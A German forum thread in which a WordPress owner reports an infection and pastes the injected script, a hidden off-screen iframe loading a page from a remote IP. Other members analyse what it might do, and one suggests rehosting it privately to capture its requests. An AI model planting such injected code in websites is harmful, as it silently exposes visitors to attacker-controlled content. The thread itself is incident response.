Wordpress infiziert ifrm.src = \"http://198.106.81.146/novo/state.php\";

Ador

Erfahrenes Mitglied
Hallo,

leider wurde mein Wordpress infiziert:

Code:
#a7cc1f#
echo "<script type=\"text/javascript\">
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src  = \"http://198.106.81.146/novo/state.php\";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;
</script>
";

#/a7cc1f#

Ich habe die betroffenen Datein bereits gesäubert und nun läuft die Seite wieder.
Aber wie schlimm ist das nun? was führt das das Script aus? Lässt sich irgendwie nachvollziehen was in dem Iframe ausgeführt wird?
 

sheel

I love Asm
Hi

wenn die Adresse schon länger so war, wie ich sie jetzt vorgefunden habe,
und das alles an Veränderungen an deiner Seite war,
ist vermutlich gar nichts passiert, die Adresse ergibt nämlich einen 404-Fehler (Nicht gefunden)

Maximal könnte dort gespeichert werden, wer das aufgerufen hat (IP, Browser, etc.etc.),
und dann als 404 getarnt...
Würde keinen großen Schaden anrichten, sowas wird sowieso ziemlich überall gespeichert.

Es kommt jedenfalls nichts zurück (HTML/CSS/JS/Java/Flash...und was es sonst noch so gibt)
was dem Benutzer/seinem Computer schaden könnte.

Der Inhaber der IP ist nicht auf einfache Weise ausfindig zu machen,
man kommt nur bis zu der amerikanischen Zweigstelle eines japanischen Providers.

PS: Warum läuft die Seite erst "jetzt" wieder?
Hats zuerst Probleme gegeben?
 

Ador

Erfahrenes Mitglied
Danke für die ausführliche Antwort.
Als der Code in verschiedenen Datein war, konnte man die Seite nicht richtig aufrufen, der Blog funktionierte nicht mehr (bzw. der Antivirus hats geblockt). Seit dem entferne heute früh geht alles wieder.

Hab alles aktualisiert und alle unnötigen Themes gelöscht, da hing nämlich das meiste drinne.
 

sheel

I love Asm
Da du das also schon live erlebt hast:
Entweder kann dein AV das problemlos abwehren oder du bist schon infiziert :suspekt:
Da es mit dieser Argumentation ja für dich sowieso nicht mehr schlimmer werden kann,
würde es dir was ausmachen, noch einen Selbstversuch zu starten? :D

Irgendeine HTML-Seite, die den Schadcode da beinhaltet, auf deinen Webspace laden
(irgendein Name, den keiner vermutet, und natürlich nirgends darauf verlinken etc. Nur für dich)
Sonst am Besten gar nichts drin, nur genug, dass es gültiges HTML ist.

Je nach Browser gibts dann eine Möglichkeit, die HTTP-Requests anzuschauen
(zB. für Firefox Extras-Webentwickler-Webkonsole),
das aufmachen und die Seite aufrufen.
Jede Zeile hat mit einem Klick darauf noch mehr Infos,
und die wären interessant (die Zeilen selbst natürlich auch).

Hintergrund des Ganzen:
Es wäre möglich, dass diese Seite anhand der Infos wie Browser etc. entscheidet,
ob und was an schädlichem Zeug gesendet wird.
Die Webkonsoleninfos würden es möglich machen, deinen Computer vorzuspielen,
um die selben Effekte zu bekommen.


Oder die Seite ist inzwischen eben wirklich weg...
 

Neue Beiträge